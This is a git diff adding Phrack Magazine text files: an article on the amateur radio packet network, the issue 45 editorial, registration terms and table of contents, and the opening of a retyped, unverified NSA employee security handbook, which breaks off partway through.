diff --git a/phrack44/9.txt b/phrack44/9.txt
new file mode 100644
index 0000000..67a8c14
--- /dev/null
+++ b/phrack44/9.txt
@@ -0,0 +1,288 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 9 of 27
+
+****************************************************************************
+
+The Amateur Radio Packet Network
+by Larry Kollar, KC4WZK
+
+ ... As a low-orbit satellite comes into range, Jim's system
+ automatically goes into action.  The computer downloads the last
+ half of an image taken by the satellite's CCD camera, the first
+ half having been taken on the previous pass.  That done, the
+ computer gets a list of new files on the satellite's BBS and
+ downloads Jim's email...
+
+It's legal.
+
+ ... Her mother is on the phone, but Rhonda accesses the local
+ BBS by radio.  She logs in to read postings from a world-wide
+ network and her email from a penpal in Great Britain...
+
+It's not Internet.
+
+ ... 11:30 p.m., and the local conference node is jumping.  Two
+ people were trying to work out a computer problem, when the
+ local expert checked in with some ideas.  Before long, three
+ more people checked in and a freewheeling discussion got under
+ way...
+
+It's happening now.
+
+While the Internet has been growing fast and with great hoopla, amateur radio
+operators (or "hams") around the world have been quietly building a network of
+their own -- the Amateur Radio Packet Network.  Like Internet, the packet
+network has a large TCP/IP component and is available to anyone who can get
+access.  Unlike Internet, getting access is very easy for nearly anyone who
+already has a ham license.
+
+The packet network is rather loosely organized, and is built and maintained by
+volunteer work.  It's basic building block is the LAN (actually a MAN, or Metro
+Area Network, but terminology is never 100% accurate), which are coordinated by
+local or regional clubs.  A LAN occupies a specific radio frequency (or channel,
+if you want to be crude about it :-), usually VHF or UHF, within a given area.
+Individuals and the regional organizations provide links between LANs for
+communications outside the local area.
+
+LAN operations work much like Ethernet -- your radio waits for the frequency to
+be clear, then transmits a packet.  This allows several connections to run at
+once.  Most packet systems can themselves maintain up to 10 simultaneous
+connections, but this feature is used only rarely.
+
+----------------------
+Packet Radio Equipment
+----------------------
+
+Hams to want to use packet radio need three pieces of equipment:
+
+- A radio (of course).  Most LANs are found on the 2-meter band (144-148 MHz,
+  with packet concentrated around 145.0 MHz and 145.6 MHz.  Many hams dedicate
+  older crystal-controlled commercial or ham radios to packet work.
+
+- A TNC (Terminal Node Controller).  This is an intelligent box that contains a
+  packet modem much like the guts of a landline (telephone) modem, and a micro-
+  computer that handles the network interface.  Other alternatives are
+  available, including a dumb radio modem that plugs into a PC (software on the
+  PC then handles the network interface), and multimode controllers that can
+  handle other digital communication methods popular among hams.  However, most
+  hams use TNCs since they are cheap (just over $100) and readily available.
+
+- A terminal, or a PC running a terminal or packet program.  Since TNCs are
+  smart devices, a simple terminal or terminal emulator is all that's required:
+  if it has a keyboard, a display, and an RS-232 port, you can use it with a
+  TNC.  However, many features (multiple connections, for example) are more
+  useful if you have a computer running special packet software.
+
+Currently, most hams use 1200 baud on 2 meters.  This is the lowest (very)
+common denominator in packet radio.  However, large urban areas are starting
+many new LANs in the 420-450 MHz amateur band; most of these use 9600 baud as
+a minimum.  As time goes on, and packet radio becomes more popular, 9600 baud
+will become the entry level.
+
+When many inter-LAN links use 56K baud, and some go as high as 2M baud, why
+are the vast majority of hams still using 1200 baud?  Part of the answer is
+technical:  to get reliable performance at better than 2400 baud, you have to
+tap into the guts of the radio, bypassing the audio stages for both transmit
+and receive.  The other part is social:  everybody else is using 1200 baud,
+why spend extra money for stuff you can't use?  The technical problem has been
+solved -- you can buy "data radios" in kits and pre-built models that come with
+the audio bypasses already in place -- but it will take a few years or a good
+reason for hams to abandon their old gear and move up.
+
+--------------------
+Local Communications
+--------------------
+
+There is lots of local action to be found on the LANs.  People and clubs run
+BBSes, conference nodes, and many personal mailboxes.  Most BBSes are set up so
+they can send email and specified bulletins (equivalent to Usenet newsgroup
+articles) to personal mailboxes during late night hours when usage is light.  A
+ham using this setup simply accesses his personal mailbox to get his feed for
+the day, not worrying about noise and propagation delays.
+
+In general, a ham who wants to add a component to a LAN just puts it up and
+advertises it on the local BBSes.  For example, a friend in my area recently
+set up a "QUOTES" BBS dedicated to sharing quotes and funny stories.  Perhaps by
+time this issue of Phrack is published, I will have a Xenix system available for
+logins over the air.
+
+In most areas, the local networks use AX.25 (a subset of X.25 designed by hams
+especially for packet radio), although TCP/IP is getting popular in some places.
+I'll talk more about this later.
+
+
+-----------------------
+Linking It All Together
+-----------------------
+
+A single LAN is useful, but the REAL power comes from hooking them together.
+Linking LANs into a wide-area network gives the Internet its power; so it goes
+with the packet network.  With inter-LAN links, we can send email nationwide
+(and to many foreign countries), post articles (bulletins) for general reading,
+and even make distant keyboard-to-keyboard contacts -- with some limitations.
+
+So how is it done?  Since many metro areas support a dozen or more LANs, these
+are usually linked together with high-speed UHF equipment using TCP/IP.  An
+Atlanta-based group called GRAPES has developed a 56K bps system; some
+experimental links in the microwave bands run as fast as 2 MEGA bps!
+
+For long-haul links, many areas rely on HF (shortwave) frequencies.  Since the
+FCC limits HF packet to 300 baud (yes, you read that right -- 300 baud), and the
+HF frequencies are often very noisy, this is a slow and painful process.  The
+amazing thing is not how slow it is, but that it works at all!
+
+For this reason, many forward-looking hams are turning to packet satellites for
+long-haul links.  The advantages include relatively quiet frequencies, 9600 baud
+data rates, and predictability; the major disadvantage is that there are simply
+not enough satellites to handle all the traffic that needs to be handled -- yet.
+I'll talk more about packet satellites later.
+
+-------------------------------
+AX.25, TCP/IP, and All the Rest
+-------------------------------
+
+The packet network grew from a handful of different experiments with radio
+networking, which has left us with several networking protocols.  Far and away
+the most popular protocol is AX.25, which is built into thousands and thousands
+of TNCs and other packet controllers.  AX.25, as implemented in most ham gear,
+offers up to 10 simultaneous connections and the ability to "digipeat" packets.
+Digipeating (DIGItal rePEATING) is one way to extend the range of a packet
+station -- if you can't reach the station you want to talk with directly, you
+can often digipeat through a station between you and the other person.  One
+problem is that you have to manually construct a route each time you want to
+contact a distant station.  The other problem is that the send-acknowledge
+sequence has to run all the way across the link.  Digipeating through more than
+one or two stations is a good way to annoy other LAN users, and unreliable to
+boot.  The connection works as follows:
+
+                 ---send---\    /-------->
+        station1            digi           station2
+                 <---------/    \-- ack --
+
+One popular improvement on the digipeater is the K-node, developed by Kantronics
+(a vendor of packet equipment).  The K-node establishes two links -- one between
+you and the node, the other between the node and the other station.  Each link
+has its own send-acknowledge loop, so a problem in one leg of the connection
+doesn't require re-sending packets through the entire end-to-end connection --
+only through the leg where the packet got garbled.  This connection works as
+follows:
+
+                 ---send---\      /--send-->
+        station1            K-node           station2
+                 <--ack----/      \-- ack --
+
+The K-node shares one disadvantage with the digipeater -- you still have to
+manually construct your own connection.  This is where the higher-level
+protocols come in.
+
+I've already mentioned TCP/IP.  Yes, we have it.  The 44.*.*.* network is
+assigned exclusively to amateur packet operations.  The network name is
+"ampr.org."  Since TNCs do not have TCP/IP in ROM, some kind of personal
+computer is required.  Most of them work -- PCs, Macs, Amigas, Ataris all have
+TCP/IP networking software.  If you've ever used the free KA9Q NOS software (or
+one of its derivatives), you have software that was developed by hams for hams.
+TCP/IP lets amateurs create all sorts of interesting experiments, such as
+setting up "wormholes" through the Internet to relay traffic between distant
+LANs.  Some parts of the country have Internet/packet email access as well.
+
+There are other "smart" networking protocols in wide use.  NET/ROM is one highly
+popular protocol.  Each NET/ROM node keeps a table of nodes heard and how to
+reach each one, eliminating the hassles of manual routing.  One problem with
+NET/ROM is that during band openings, VHF and UHF signals can carry for hundreds
+of miles beyond their normal range.  ("Line of sight?"  Yeah right -- a friend
+of mine in north Georgia has made contacts with people as far away as Lincoln,
+Nebraska on 2 meters using the stuff he carries around in his truck.)  After a
+band opening, NET/ROM nodes find themselves stuffed with faraway nodes that
+they can't hear anymore.
+
+The phreakers in the audience may find ROSE interesting.  ROSE bases addresses
+on the NANP area code/prefix scheme.  If a person uses ROSE, and you know her
+call sign and phone number, you contact her at the address "<call> VIA AAAPPP."
+Unfortunately, ROSE does not have the widespread use necessary to make it a
+nationwide network.
+
+There are several other networking protocols in use, such as TheNet and a few
+others.  However, I expect TCP/IP to replace most if not all competing protocols
+in a few years.
+
+-----------------
+Packet Satellites
+-----------------
+
+Here's something you won't see on Internet.  Maybe some of Internet's traffic
+goes over satellites, but direct contact?
+
+Since 1959, amateurs have launched nearly 30 satellites into orbit.  Nearly
+20 of these are still in service -- and most of them are dedicated at least
+part-time to packet operation.
+
+>From a user's standpoint, there are two different types of packet satellite --
+one type using 1200 bps FSK (frequency-shift keying) and the other using 9600
+bps FM.  The current population is split, with about a half dozen of each type.
+Most packet satellites, or pacsats, are based on a design from University of
+Surrey in Great Britain -- they're small and lightweight, keeping launch costs
+to a minimum.  Pacsats are always launched as secondary payloads, and often
+ride as ballast to reduce launch costs even further.
+
+Many pacsats have on-board CCD cameras that can take pictures of Earth or space,
+and make the pictures available for downloading from the on-board BBS.  Other
+pacsats carry equipment that allow them to be switched into a transponder mode,
+such as the Japanese FujiSat that carries SSB and CW (Morse code) contacts on
+Wednesdays, or can even be converted into an FM repeater such as AO-21.
+
+Some special software has been developed to make the most of the limited
+bandwidth.  For example, pictures can take more time to download than is
+available during a single pass (normally 10-20 minutes), especially if other
+users are sending and downloading other files at the same time.  The software,
+called PB, lets you download and upload as much of a file as possible during
+one pass, then gets the rest of the file on subsequent passes.  Other software
+lets you automate the entire process, so you can get new files as they arrive
+without having to get up early for that 4 a.m. pass.  PB also lets you download
+files by listening in -- if another person is downloading the file you want, you
+can simply listen to the downlink and let PB construct the file for you.  This
+is a good way to save bandwidth; if two people want the same file, only one of
+them has to actually download it.  If there are holes in the file, you can fill
+them in later.
+
+--------------------------------
+Getting an Amateur Radio License
+--------------------------------
+
+There are five grades of amateur radio licenses in the U.S.; from lowest to
+highest, they are Novice, Technician General, Advanced, and Extra.  Each grade
+of license has a test on theory and regulations, with a Morse code "element"
+required for several of them.
+
+The good news is that 99% of what packet radio has to offer is available to the
+Technician.  The better news is that the Technician license, as of January
+1991, no longer requires you to learn Morse code.  The "codeless Tech" has
+brought a great deal of new blood into ham radio, including many hackers and
+mainstream computer people.
+
+Study guides are available from Radio Shack and the American Radio Relay League
+(ARRL); the ARRL's guides are the better of the two, in my opinion.  You can get
+ARRL study guides at most ham radio stores or directly from the ARRL.  If you
+want to get a codeless Technician license, you'll need the Novice and the
+Technician study guides.  The material isn't very hard to learn; anyone who can
+navigate the guts of Ma Bell will have no trouble with the Novice or Technician
+exams. :-)
+
+The ARRL can also provide you with a free schedule of exams in your area.  The
+FCC some years ago turned over all testing to accredited amateur groups, so you
+should be able to find an exam at a time and place convenient to you.  Many
+other ARRL services are available through an Internet mail server; send mail
+to info-server@arrl.org containing the line "send index" in the body of your
+message.
+
+If there's any bad news, it's that a group of diehards can't stand the idea of
+a code-free ham license.  Some of these folks will go out of the way to hassle
+code-free hams.  Fortunately, most of them are afraid of computers and don't
+do packet.  Other things to watch out for -- the FCC frowns on profanity,
+intentional jamming, and encrypted data sent over the air.  A small price to
+pay, in my opinion, for the opportunity to build and explore a worldwide network
+without the Secret Service breathing down your neck.
+
+-- end --
+
+ 
diff --git a/phrack45/1.txt b/phrack45/1.txt
new file mode 100644
index 0000000..97721da
--- /dev/null
+++ b/phrack45/1.txt
@@ -0,0 +1,346 @@
+                              ==Phrack Magazine==
+
+                   Volume Five, Issue Forty-Five, File 1 of 28
+
+                                 Issue 45 Index
+                              ___________________
+
+                               P H R A C K   4 5
+
+                                 March 30, 1994
+                              ___________________
+
+                       ~ Dedicated to CRS--(1969-1994) ~
+
+Well kiddies, it's Easter time again.  Easter has got to be one of my
+favorite holidays of the bunch.  No, no, no...not for any of that spiritual
+rebirth or religious hooey.  Easter brings with it two of the most joyous
+items in the world:  Reese's Peanut Butter Eggs and Marshmallow Peeps.
+
+In the past two weeks I have eaten my body weight many times over
+in peanut butter eggs.  I don't know what it is about those damn things, but
+I just can't stop eating them.  And the Peeps?  Oh man, if you haven't put
+a Marshmallow Peep in the microwave, you just haven't lived.  The cute
+little yellow duckie takes on whole new dimensions as it becomes superheated
+in the nuclear nightmare of a conventional microwave oven.  It becomes
+like a scene from Akira as the Peep grows at an alarming rate, almost filling
+up the entire oven with its grossly mutated form.  You can almost hear
+it squealing with agony.  Go do it right now, and then finish reading this
+issue.
+
+The net has been more fun the past few months than a barrel full of monkeys,
+(or a hottub full of co-eds, pick your own comparison).  In the time since
+last issue I have been the subject of a lot of attention.  I've been
+pseudo-framed for hacking a handful of sites with fake syslog messages, I've
+been spoofed as the source of a pre-release CERT advisory, I've been
+mentioned in numerous altered motd files on many systems, and even better,
+spoofed messages from "erikb@mindvox.phantom.com" were posted to a
+homosexual listserv announcing my supposed "exit from the closet."
+
+Well, unfortunately for everyone, including the hundreds of hopeful gay
+respondents to the forged post, I only like women.  But it sure is nice to
+know that even men are into me.  What an ego boost.  Seriously though, one
+has to wonder how the forgers knew that something called queernet.org
+even existed.  I think I get around on the net, but I'd never heard of it.
+Have you?  Perhaps the Posse are 'closer' than we thought.
+
+And the abuse continues.  God knows why.  The common thread seems to be:
+"Erikb is a nark."  Let's look at that logic, shall we?  If Erikb is a
+nark, then he would be on some terms with law enforcement.  If he were
+on some terms with law enforcement, then he would have no qualms about
+handing over names of people doing bad things.  If had no qualms about
+handing over names of people doing bad things, then law enforcement would
+open cases based on that information.  If law enforcement opened cases based
+on that information, then people would get raided.  If people would get
+raided, then people would almost certainly go to jail.
+
+Why on earth would someone want to evoke a chain of events that would
+land them in jail?  Or do they not believe their own statements about
+me being a nark?  Or are they convinced that they are so good that
+they cannot get caught?  Or are they just pathetically stupid?
+
+Personally I choose the latter.  These guys are not good.  And they are
+very dumb.  They make more mistakes than I've seen in a long time.  And
+they've pissed off very powerful people.  (No, I'm not including myself in
+that list of 'Powerful People.')  It's good that much of MOD is getting out
+of jail soon.  Now those guys were legitimately GOOD HACKERS.  They were
+definitely assholes, but damn good computer hackers.  It will be nice to have
+some harassment from dickheads with skills once again.
+
+But I digress.
+
+Phrack's gotten a bit of notice as of late.  In Mondo-2000, in their
+"Pirate Media" article, and in Richard Kadrey's "Covert Culture"
+sourcebook.  Of course both of these got the subscription information
+wrong, but hell, I've learned to expect as much.  Also, the mention
+of Phreak Accident's fantastic "Playing Hide & Seek -- Unix Style"
+article in Dan Farmer and Weitse Venema's "Improving The Security of
+Your Site by Breaking Into It" article brought in hundreds of
+new subscribers.  Let's see how many of these security people register.
+(How many fingers am I holding up?)
+
+Speaking of such, Phrack has a couple of other registrations now.  One is a
+teacher who wanted to use Phrack in her class.  Kudos to her!  The other was
+a cool guy who just wanted to register because he felt like it.  Why
+can't the rest of you be more like him?
+
+Anyway, the money is going to sponsor a new contest.  (Considering how
+well the last one went...not!)  This time, we are serious, so read in
+LINE NOISE for more info.
+
+What else?  Phrack has now made the big time in the Federal Penal system.
+We're the proud recipients of the Bureau of Prisons form 328(58).  Our
+material was considered to be a breach of security of the institution.
+This, of course, pissed me off.  But hell, on the same form, they
+denote how "Body Hair, Plant Shavings, and Sexually Explicit Personal
+Photos" are also inappropriate.  Phrack or Body Hair.  You make the call.
+
+Phrack 45...let's see...
+
+If this issue doesn't cause neck hairs to bristle on everyone within spying
+distance of the beltway, I will be very disappointed.  It's amazing what you
+find in your mailbox.
+
+We've got a lot of nifty things in this issue.  More source code for
+you to play with, uuencoded goodness, cellular info, telco / pbx info,
+Ho Ho Con coverage, ancient hack memorabilia, and a plethora of spurious
+scatological material.  (translated:  lots of other crap)
+
+Enjoy.
+
+-------------------------------------------------------------------------
+
+                        READ THE FOLLOWING
+
+                IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.  Cost is $100.00 US per user for
+subscription registration.  Cost of multi-user licenses will be
+negotiated on a site-by-site basis.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+Enclosed is  $________
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Hard Copy:       _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
+                3L33t : CERT  (not)
+                 News : Datastream Cowboy
+         Do Not Taunt : Happy Fun Ball
+          Photography : dFx
+             Dolomite : Rudy Ray Moore
+    Prison Consultant : Co / Dec
+     A Hacker's Dream : The L0PHT
+            Thanks To : H.B. Reese Candy Co., Control C, Seven Up, Emmanuel
+                        Goldstein, The U.S. Government, The Omega, White
+                        Knight, Quentin, Manny Farber, Raoul, Video Games
+                        Magazine, Co/Dec, Darth Vader, Charlie X, The Fixer,
+                        Optik Nerve, Dr. Delam, Data King, Opticon the
+                        Disassembled
+
+
+"You're not too smart.  I like that in a hacker."
+(With apologies to Kathleen Turner)
+
+Phrack Magazine V. 5, #45, March 30, 1994.     ISSN 1068-1035
+Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission of the Editor-In-Chief.  Phrack Magazine is made available
+quarterly to the amateur computer hobbyist free of charge.  Any
+corporate, government, legal, or otherwise commercial usage or
+possession (electronic or otherwise) is strictly prohibited without
+prior registration, and is in violation of applicable US Copyright laws.
+To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
+the list.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278       (Phrack Mailing Address)
+                    Austin, TX 78701
+
+                    ftp.netsys.com            (Phrack FTP Site)
+                    /pub/phrack
+
+                    phrack@well.sf.ca.us      (Phrack E-mail Address)
+                 or phrackmag@aol.com
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
+ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
+a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
+tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
+=q2KB
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+  -= Phrack 45 =-
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1.  Introduction by The Editor                               17 K
+ 2.  Phrack Loopback Part I                                   31 K
+ 3.  Phrack Loopback Part II / Editorial                      40 K
+ 4.  Line Noise Part I                                        49 K
+ 5.  Line Noise Part II                                       50 K
+ 6.  Line Noise Part III                                      59 K
+ 7.  Phrack Prophile on Control C                             22 K
+ 8.  Running a BBS on X.25 by Seven Up                        15 K
+ 9.  No Time for Goodbyes by Emmanuel Goldstein               21 K
+ 10. Security Guidelines                                      55 K
+ 11. Ho Ho Con Miscellany by Various Sources                  32 K
+ 12. Quentin Strikes Again by The Omega and White Knight      28 K
+ 13. 10th Chaos Computer Congress by Manny E. Farber          23 K
+ 14. Defcon II information                                    26 K
+ 15. VMS Information by Various Sources                       34 K
+ 16. DCL BBS PROGRAM by Raoul                                 23 K
+ 17. Hollywood-Style Bits & Bytes by Richard Goodwin          50 K
+ 18. Fraudulent Applications of 900 Services by Co/Dec        15 K
+ 19. Screwing Over Your Local McDonald's by Charlie X         20 K
+ 20. The Senator Markey Hearing Transcripts                   72 K
+ 21. The Universal Data Converter by Maldoror                 45 K
+ 22. BOX.EXE - Box Program for Sound Blaster by The Fixer     13 K
+ 23. Introduction To Octel's ASPEN by Optik Nerve             12 K
+ 24. Radio Free Berkeley Information                          35 K
+ 25. The MCX7700 PABX System by Dr. Delam                     22 K
+ 26. Cellular Debug Mode Commands by Various Sources          13 K
+ 27. International Scenes by Various Sources                  63 K
+ 28. Phrack World News by Datastream Cowboy                   17 K
+
+                                                    Total:   902 K
+
+_______________________________________________________________________________
+
+     "You can't hold a man down without staying down with him."
+     (Booker T. Washington)
+
+     "I am not one of those weak-spirited, sappy Americans who want
+     to be liked by all the people around them.  I don't care if people
+     hate my guts; I assume most of them do.  The important question
+     is:  'What are they in a position to do about it?'"
+     (William S. Burroughs)
diff --git a/phrack45/10.txt b/phrack45/10.txt
new file mode 100644
index 0000000..617d7bc
--- /dev/null
+++ b/phrack45/10.txt
@@ -0,0 +1,982 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 10 of 28
+
+****************************************************************************
+
+[NOTE:  This file was retyped from an anonymous photocopied submission.  The
+        authenticity of it was not verified.]
+
+
+Security Guidelines
+
+This handbook is designed to introduce you to some of the basic
+security principles and procedures with which all NSA employees must comply.
+It highlights some of your security responsibilities, and provides guidelines
+for answering questions you may be asked concerning your association with this
+Agency.  Although you will be busy during the forthcoming weeks learning your
+job, meeting co-workers, and becoming accustomed to a new work environment, you
+are urged to become familiar with the security information contained in this
+handbook.  Please note that a listing of telephone numbers is provided at the
+end of this handbook should you have any questions or concerns.
+
+Introduction
+
+In joining NSA you have been given an opportunity to participate in the
+activities of one of the most important intelligence organizations of the United
+States Government.  At the same time, you have also assumed a trust which
+carries with it a most important individual responsibility--the safeguarding of
+sensitive information vital to the security of our nation.
+
+While it is impossible to estimate in actual dollars and cents the value of the
+work being conducted by this Agency, the information to which you will have
+access at NSA is without question critically important to the defense of the
+United States.  Since this information may be useful only if it is kept secret,
+it requires a very special measure of protection.  The specific nature of this
+protection is set forth in various Agency security regulations and directives.
+The total NSA Security Program, however, extends beyond these regulations.  It
+is based upon the concept that security begins as a state of mind.  The program
+is designed to develop an appreciation of the need to protect information vital
+to the national defense, and to foster the development of a level of awareness
+which will make security more than routine compliance with regulations.
+
+At times, security practices and procedures cause personal inconvenience.  They
+take time and effort and on occasion may make it necessary for you to
+voluntarily forego some of your usual personal perogatives.  But your
+compensation for the inconvenience is the knowledge that the work you are
+accomplishing at NSA, within a framework of sound security practices,
+contributes significantly to the defense and continued security of the United
+States of America.
+
+I extend to you my very best wishes as you enter upon your chosen career or
+assignment with NSA.
+
+Philip T. Pease
+Director of Security
+
+
+INITIAL SECURITY RESPONSIBILITIES
+
+Anonymity
+
+Perhaps one of the first security practices with which new NSA personnel should
+become acquainted is the practice of anonymity.  In an open society such as ours,
+this practice is necessary because information which is generally available to
+the public is available also to hostile intelligence.  Therefore, the Agency
+mission is best accomplished apart from public attention.  Basically, anonymity
+means that NSA personnel are encouraged not to draw attention to themselves nor
+to their association with this Agency.  NSA personnel are also cautioned neither
+to confirm nor deny any specific questions about NSA activities directed to them
+by individuals not affiliated with the Agency.
+
+The ramifications of the practice of anonymity are rather far reaching, and its
+success depends on the cooperation of all Agency personnel.  Described below you
+will find some examples of situations that you may encounter concerning your
+employment and how you should cope with them.  Beyond the situations cited, your
+judgement and discretion will become the deciding factors in how you respond to
+questions about your employment.
+
+Answering Questions About Your Employment
+
+Certainly, you may tell your family and friends that you are employed at or
+assigned to the National Security Agency.  There is no valid reason to deny them
+this information.  However, you may not disclose to them any information
+concerning specific aspects of the Agency's mission, activities, and
+organization.  You should also ask them not to publicize your association with
+NSA.
+
+Should strangers or casual acquaintances question you about your place of
+employment, an appropriate reply would be that you work for the Department of
+Defense.  If questioned further as to where you are employed within the
+Department of Defense, you may reply, "NSA."  When you inform someone that you
+work for NSA (or the Department of Defense) you may expect that the next
+question will be, "What do you do?"  It is a good idea to anticipate this
+question and to formulate an appropriate answer.  Do not act mysteriously about
+your employment, as that would only succeed in drawing more attention to
+yourself.
+
+If you are employed as a secretary, engineer, computer scientist, or in a
+clerical, administrative, technical, or other capacity identifiable by a general
+title which in no way indicates how your talents are being applied to the
+mission of the Agency, it is suggested that you state this general title.  If
+you are employed as a linguist, you may say that you are a linguist, if
+necessary.  However, you should not indicate the specific language(s) with which
+you are involved.
+
+The use of service specialty titles which tend to suggest or reveal the nature of
+the Agency's mission  or specific aspects of their work.  These professional
+titles, such as cryptanalyst, signals collection officer, and intelligence
+research analyst, if given verbatim to an outsider, would likely generate
+further questions which may touch upon the classified aspects of your work.
+Therefore, in conversation with outsiders, it is suggested that such job titles
+be generalized.  For example, you might indicate that you are a "research
+analyst."  You may not, however, discuss the specific nature of your analytic
+work.
+
+Answering Questions About Your Agency Training
+
+During your career or assignment at NSA, there is a good chance that you will
+receive some type of job-related training.  In many instances the nature of the
+training is not classified.  However, in some situations the specialized
+training you receive will relate directly to sensitive Agency functions.  In
+such cases, the nature of this training may not be discussed with persons
+outside of this Agency.
+
+If your training at the Agency includes language training, your explanation for
+the source of your linguistic knowledge should be that you obtained it while
+working for the Department of Defense.
+
+You Should not draw undue attention to your language abilities, and you may not
+discuss how you apply your language skill at the Agency.
+
+If you are considering part-time employment which requires the use of language
+or technical skills similar to those required for the performance of your NSA
+assigned duties, you must report (in advance) the anticipated part-time work
+through your Staff Security Officer (SSO) to the Office of Security's Clearance
+Division (M55).
+
+Verifying Your Employment
+
+On occasion, personnel must provide information concerning their employment to
+credit institutions in connection with various types of applications for credit.
+In such situations you may state, if you are a civilian employee, that you are
+employed by NSA and indicate your pay grade or salary.  Once again, generalize
+your job title.  If any further information is desired by persons or firms with
+whom you may be dealing, instruct them to request such information by
+correspondence addressed to:  Director of Civilian Personnel, National Security
+Agency, Fort George G. Meade, Maryland 20755-6000.  Military personnel should
+use their support group designator and address when indicating their current
+assignment.
+
+If you contemplate leaving NSA for employment elsewhere, you may be required to
+submit a resume/job application, or to participate in extensive employment
+interviews.  In such circumstances, you should have your resume reviewed by the
+Classification Advisory Officer (CAO) assigned to your organization.  Your CAO
+will ensure that any classified operational details of your duties have been
+excluded and will provide you with an unclassified job description.  Should you
+leave the Agency before preparing such a resume, you may develop one and send it
+by registered mail to the NSA/CSS Information Policy Division (Q43) for review.
+Remember, your obligation to protect sensitive Agency information extends
+beyond your employment at NSA.
+
+The Agency And Public News Media
+
+From time to time you may find that the agency is the topic of reports or
+articles appearing in public news media--newspapers, magazines, books, radio
+and TV.  The NSA/CSS Information Policy Division (Q43) represents the Agency in
+matters involving the press and other media.  This office serves at the
+Agency's official media center and is the Director's liaison office for public
+relations, both in the community and with other government agencies.  The
+Information Policy Division must approve the release of all information for and
+about NSA, its mission, activities, and personnel.  In order to protect the
+aspects of Agency operations, NSA personnel must refrain from either confirming
+or denying any information concerning the Agency or its activities which may
+appear in the public media.  If you are asked about the activities of NSA, the
